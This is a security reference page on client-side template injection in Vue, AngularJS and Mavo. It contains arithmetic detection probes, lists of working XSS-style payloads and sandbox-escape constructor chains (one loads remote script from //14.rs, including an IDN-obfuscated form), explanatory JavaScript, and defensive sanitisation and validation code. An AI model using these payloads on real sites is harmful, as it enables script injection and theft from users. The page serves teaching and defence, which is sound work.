
Client-Side Template Injection (CSTI)

🔍 Introduction

CSTI (Client-Side Template Injection) is an attack in which the attacker gets template code of their own included in an existing template, so that the template engine carries out actions of the attacker's choosing. When the injection takes place on the client side, in a template that the browser compiles and evaluates, it is called CSTI.

CSTI executes JavaScript on the client side, so it has the same attack vector and the same risk as XSS; in practice it is fair to treat the two as almost the same attack. Some payloads, however, only work through CSTI, which is why they are collected in a separate Cullinan document.

🗡 Offensive techniques

Detect

Like SSTI, CSTI can only occur when a template engine is part of the service. Here that means the front-end frameworks commonly used to build web UIs that compile and evaluate templates in the browser at runtime, such as VueJS (the full build with the runtime compiler), AngularJS and Mavo. React, by contrast, compiles JSX at build time and never interprets template syntax found in strings, so it is not affected in the same way. The attack succeeds when user input can influence the template syntax that the framework interprets.

As with SSTI, confirm that input reaches the template by placing a simple arithmetic expression inside the template syntax and checking whether the response shows the computed result.

GET /test?q=abcd{{412*343}}efgh HTTP/1.1

Not vulnerable: the input is reflected verbatim

abcd{{412*343}}efgh

Vulnerable: the expression was evaluated (412*343 = 141316)

abcd141316efgh
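Detection probes and a classifier, added here as an example that is not part of the Cullinan page. It generalises the arithmetic check above to the two delimiter styles this page covers (`{{ }}` and `[ ]`) and uses the fact that a CSTI-vulnerable page still contains the raw expression in its HTTP body while only the rendered DOM shows the product: comparing both views tells client-side evaluation apart from server-side evaluation and from plain reflection. The `fakeAngularJsPage` function and its markup are constructed stand-ins for a target, not a real site.

```javascript
// Added example (not from the Cullinan page): arithmetic probes for the
// delimiter styles covered here, and a classifier that separates client-side
// evaluation from server-side evaluation and from plain reflection.
//
// Two views of the same page are needed: the raw HTTP body (what curl or
// fetch() returns) and the text the browser shows after the front-end
// framework has run. A CSTI-vulnerable page still carries the raw expression
// in the HTTP body; only the rendered DOM contains the computed value.

const SYNTAXES = [
  { name: 'double-curly', wrap: (e) => `{{${e}}}`, engines: ['AngularJS', 'Vue', 'Mavo with mv-expressions="{{ }}"'] },
  { name: 'square',       wrap: (e) => `[${e}]`,   engines: ['Mavo'] },
];

// Two operands whose product is unlikely to occur naturally in the page;
// the prefix/suffix markers pin the match to the reflection point.
function buildProbes(a = 412, b = 343, prefix = 'abcd', suffix = 'efgh') {
  return SYNTAXES.map((s) => ({
    syntax: s.name,
    engines: s.engines,
    payload: prefix + s.wrap(`${a}*${b}`) + suffix, // what is sent; an untouched reflection looks identical
    evaluated: prefix + (a * b) + suffix,           // what an evaluated reflection looks like
  }));
}

// rawBody: HTTP response body; renderedText: DOM text after client-side scripts ran.
function classify(probe, rawBody, renderedText) {
  const rawEvaluated = rawBody.includes(probe.evaluated);
  const rawReflected = rawBody.includes(probe.payload);
  const domEvaluated = renderedText.includes(probe.evaluated);
  if (rawEvaluated) return 'server-side evaluation (SSTI, not CSTI)';
  if (rawReflected && domEvaluated) return 'client-side evaluation (CSTI)';
  if (rawReflected) return 'reflected, not evaluated';
  return 'not reflected';
}

// Run every probe through `fetchViews(payload) -> { rawBody, renderedText }`.
// In a browser, rawBody would come from fetch(url).then(r => r.text()) and
// renderedText from document.body.innerText after loading the same URL.
function detect(fetchViews, probes = buildProbes()) {
  return probes.map((p) => {
    const { rawBody, renderedText } = fetchViews(p.payload);
    return { syntax: p.syntax, engines: p.engines, result: classify(p, rawBody, renderedText) };
  });
}

// Constructed stand-in for a target: the server reflects the query verbatim,
// and an AngularJS-style front end interpolates {{ }} in the DOM but not [ ].
function fakeAngularJsPage(payload) {
  const rawBody = `<html><body><div ng-app>Results for: ${payload}</div></body></html>`;
  const renderedText = `Results for: ${payload.replace(/\{\{(\d+)\*(\d+)\}\}/g,
    (_, x, y) => String(Number(x) * Number(y)))}`;
  return { rawBody, renderedText };
}

// detect(fakeAngularJsPage) reports CSTI for {{ }} and plain reflection for [ ].
```

Whichever syntax comes back as evaluated narrows the engine list, and the engine in turn decides which of the exploitation payloads below are worth trying.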

Exploitation

Vue

<div v-html="alert(45)"> aaa</div>

Angular

<input ng-focus=$event.view.alert(45)>

Mavo

[7*7]
[(1,alert)(1)]
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
<a data-mv-if='1 or self.alert(1)'>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]

Bypass protection

Vue

{{toString().constructor.constructor('alert(1)')()}}
// toString() yields a string, String.constructor is Function, and Function(code) is the same `new Function(code)` primitive Vue itself uses to build render functions, so the payload runs arbitrary JavaScript outside the template scope
{{_c.constructor('alert(1)')()}}
<p v-show="_c.constructor`alert(1)`()">
<x v-on:click='_b.constructor`alert(1)`()'>click</x>
<x v-bind:a='_b.constructor`alert(1)`()'>
<x v-bind:is="'script'" src="//14.rs" />
<x is=script src=//⑭.₨>
// ⑭.₨ is 14.rs written with the circled-14 and rupee-sign code points; the browser's IDNA normalisation maps them to 14 and rs
<img src @error="e=$event.path;e[e.length-1].alert(1)">
<img src @error="e=$event.path.pop().alert(1)">
<img src @error="e=$event.composedPath().pop().alert(1)">
// $event.path was a non-standard Chrome-only property and has since been removed; composedPath() is the standard equivalent and works across browsers
<img src @error=this.alert(1)>
{{-function(){this.alert(1)}()}}
<svg @load=this.alert(1)>
<svg@load=this.alert(1)>

Minimized

{{_c.constructor('alert(1)')()}}  // (32 bytes)
{{_b.constructor`alert(1)`()}}    // (30 bytes)

Angular (AngularJS 1.x; the expression sandbox was removed in 1.6, so these expressions evaluate without any sandbox escape)

{{constructor.constructor('alert(1)')()}}
{{[].pop.constructor&#40'alert\u00281\u0029'&#41&#40&#41}}
{{0[a='constructor'][a]('alert(1)')()}}
{{$eval.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
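Why the constructor-chain payloads in the Vue and Angular lists above work, as an added example that is not Vue or AngularJS source. It models how a runtime template compiler evaluates an expression: the expression becomes a function body of the form `with(this){ return (expr) }`, and `this` is the component instance behind a Proxy that refuses identifiers that are neither instance properties nor whitelisted globals (the shape of Vue 2's proxy handler; the `ALLOWED_GLOBALS` list and the `_c` helper here are simplified assumptions). A direct `alert(1)` is blocked, but the proxy only mediates identifier lookup: any value it hands out, even the inherited `toString` or `constructor`, leads by ordinary property access to `Function`, which evaluates arbitrary code.

```javascript
// Added example (not Vue or AngularJS source): a minimal model of how a
// runtime template compiler evaluates expressions, and why reaching Function
// through a .constructor chain escapes the expression scope.

// Simplified stand-in for the globals a framework lets expressions use.
const ALLOWED_GLOBALS = new Set([
  'Math', 'Number', 'String', 'Boolean', 'parseInt', 'parseFloat',
  'JSON', 'undefined', 'NaN', 'Infinity',
]);

// Build the "component instance": data plus a render helper named like Vue's _c.
function makeScope(data) {
  const vm = Object.assign({}, data);
  vm._c = function createElement(tag) { return { tag }; }; // any function: its .constructor is Function
  return new Proxy(vm, {
    // `with` consults `has` for every free identifier. Claiming every name
    // except the whitelisted globals stops lookups from falling through to
    // window/globalThis, which is how alert, document, fetch... get blocked.
    has(target, key) {
      return !ALLOWED_GLOBALS.has(key);
    },
    get(target, key) {
      // Symbols (e.g. Symbol.unscopables, consulted by `with`) and anything
      // reachable on the instance, including inherited Object.prototype
      // members such as toString and constructor, are handed out as-is.
      if (typeof key === 'symbol' || key in target) return Reflect.get(target, key);
      throw new ReferenceError(`"${String(key)}" is not defined on the instance`);
    },
  });
}

// Evaluate one template expression the way a runtime compiler would:
// compile it into `with(this){ return (expr) }` and call it on the proxied instance.
function evaluate(expr, data = {}) {
  const fn = new Function(`with (this) { return (${expr}); }`);
  return fn.call(makeScope(data));
}

// Wrapper that reports a blocked payload instead of throwing.
function tryEvaluate(expr, data = {}) {
  try {
    return { ok: true, value: evaluate(expr, data) };
  } catch (e) {
    return { ok: false, error: e.constructor.name };
  }
}

// Ordinary data binding works:            evaluate('msg + "!"', { msg: 'hi' }) -> 'hi!'
// Whitelisted globals work:               evaluate('Math.max(1, 9)')            -> 9
// A bare global is refused:               tryEvaluate('alert(1)').ok           -> false
// ...but the escapes from the lists above all reach Function:
//   evaluate('toString().constructor.constructor("return 6*7")()')  -> 42
//   evaluate('_c.constructor("return 6*7")()')                       -> 42   (Vue _c payload)
//   evaluate('constructor.constructor("return 6*7")()')              -> 42   (AngularJS payload)
```

The identifier filter never sees `.constructor`, because property access on a value it already released is plain JavaScript; that is the whole reason the minimized `_c`/`_b` payloads are so short, and the reason denying more identifiers does not fix this class of sandbox.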

🛡 Defensive techniques

CSTI is handled like most other injection attacks: the best defence is to apply sanitization and input validation together, as two layers. Where that is not feasible, pick one of the two, or combine it with sandboxing.

Sanitization

Do not build a template from user input at all. Where user input has to be displayed, pass it in through the parameters the template engine itself provides (its data bindings), so the input is treated as a value and can never alter the template. Escaping the input for HTML is not a substitute: {{ contains no HTML-special characters, and when a framework compiles an in-DOM template the browser has already decoded entities such as &#123; back into { before the engine sees them.

Input Validation

Finally, input validation can reject or escape the special characters that make up template delimiters, so that they never reach the template. This is the same approach used against some XSS and SQLi. The characters to watch are:

{ }
[ ]
< >

much as in XSS countermeasures. Note that { and [ carry no meaning in HTML, so a plain HTML escaper passes {{7*7}} through untouched; the check has to target the template delimiters themselves.
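The sanitization and input-validation advice above in code, as an added example that is not from the Cullinan page or any framework. The `render` function is a deliberately small stand-in for a client-side template compiler (assumption: a `{{ expr }}` syntax evaluated against a data object, in the style of Vue or AngularJS); `renderUnsafe` splices user input into the template source, `renderSafe` passes the same input through the template's own parameter, and `containsTemplateSyntax` is the delimiter check from the Input Validation section. The comment strings and the `secret` field are constructed inputs.

```javascript
// Added example (not from the Cullinan page or any framework): the same user
// input handled the wrong way (spliced into the template source) and the right
// way (passed as data through the template's parameter), plus the delimiter
// check from the Input Validation section.

// Minimal {{ expr }} renderer standing in for a runtime template compiler.
// Each expression is evaluated against `data`, as a client-side engine would,
// and the result is HTML-escaped.
function render(template, data) {
  return template.replace(/\{\{([\s\S]+?)\}\}/g, (_, expr) =>
    escapeHtml(String(new Function(`with (this) { return (${expr}); }`).call(data))));
}

function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// WRONG: the template source is built from user input, so template syntax in
// the input is compiled and evaluated with access to the component's data.
function renderUnsafe(userInput, data) {
  return render(`<p class="comment">${userInput}</p>`, data);
}

// RIGHT: the template is a constant; user input only ever enters as a value
// in `data`, so {{ inside it is text, never syntax.
function renderSafe(userInput, data) {
  return render('<p class="comment">{{ comment }}</p>',
    Object.assign({}, data, { comment: userInput }));
}

// Input validation: flag anything that looks like template syntax before it is
// stored. Delimiters and directive attributes are what matter here, not HTML
// metacharacters: {{7*7}} contains nothing an HTML escaper would touch.
const TEMPLATE_SYNTAX = /\{\{|\}\}|\$\{|\[[^\]]*\]|\bv-[\w-]+=|\bng-[\w-]+=|\bmv-[\w-]+=|@\w+=/;
function containsTemplateSyntax(input) {
  return TEMPLATE_SYNTAX.test(input);
}

// With data = { secret: 'token-123' } (constructed):
//   renderUnsafe('{{7*7}}', data)   -> '<p class="comment">49</p>'          (evaluated)
//   renderUnsafe('{{secret}}', data) -> '<p class="comment">token-123</p>'   (data leaked)
//   renderSafe('{{7*7}}', data)     -> '<p class="comment">{{7*7}}</p>'     (literal text)
//   containsTemplateSyntax('{{7*7}}') -> true; containsTemplateSyntax('2 * 3 = 6') -> false
```

`renderSafe` still emits the literal `{{7*7}}` in its output, and that is correct as long as the string reaches the page through a data binding (`v-text`, `textContent`, an interpolation fed from `data`) and is never handed back to the compiler as template source, for example by being written into markup that the framework later mounts as an in-DOM template.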

Sandboxing

When templates genuinely have to be generated and rendered from user input, there is no way around processing user-supplied template code. In that case the user-supplied template can be run in a sandbox that limits what the injected code is able to reach, so that attack code cannot have any real effect.

Sandboxes of this kind leave plenty of room for bypasses (the constructor-chain payloads listed above escape exactly such expression sandboxes), so sandboxing should be combined with the two measures above rather than relied on by itself wherever possible.

🕹 Tools

📚 Articles

📌 References

Licensed under CC BY-NC-SA 4.0